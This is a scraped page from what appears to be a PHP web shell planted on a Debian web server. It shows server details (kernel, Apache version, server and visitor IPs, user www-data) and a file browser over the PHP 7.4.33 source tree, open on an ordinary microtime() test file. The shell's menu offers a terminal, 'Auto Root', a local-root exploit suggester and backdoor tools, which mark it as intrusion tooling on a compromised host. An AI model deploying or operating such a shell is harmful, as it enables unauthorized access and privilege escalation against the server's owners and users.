Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.41
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
src /
php-7.4.33 /
ext /
standard /
tests /
time /
Delete
Unzip
Name
Size
Permission
Date
Action
001.phpt
631
B
-rw-rw-r--
2022-10-31 11:36
bug38524.phpt
501
B
-rw-rw-r--
2022-10-31 11:36
bug60222.phpt
385
B
-rw-rw-r--
2022-10-31 11:36
idate.phpt
340
B
-rw-rw-r--
2022-10-31 11:36
strptime_basic.phpt
1.72
KB
-rw-rw-r--
2022-10-31 11:36
strptime_error.phpt
1.63
KB
-rw-rw-r--
2022-10-31 11:36
strptime_parts.phpt
1.52
KB
-rw-rw-r--
2022-10-31 11:36
Save
Rename
--TEST-- microtime() function --SKIPIF-- <?php if (!function_exists('microtime')) die('skip microtime() not available'); ?> --FILE-- <?php $passed = 0; $failed = 0; $last_m = 0; $last_t = 0; $result = ''; set_time_limit(0); for ($i=1;$i<=100000;$i++) { list($micro,$time)=explode(" ",microtime()); if ($time > $last_t || ($time == $last_t && $micro >= $last_m)) { $passed++; } else if ($failed++ <=10) { $result .= sprintf('%06d', $i).": $time $micro < $last_t $last_m\n"; } $last_m = $micro; $last_t = $time; } echo "Passed: $passed\n"; echo "Failed: $failed\n"; echo $result; ?> --EXPECT-- Passed: 100000 Failed: 0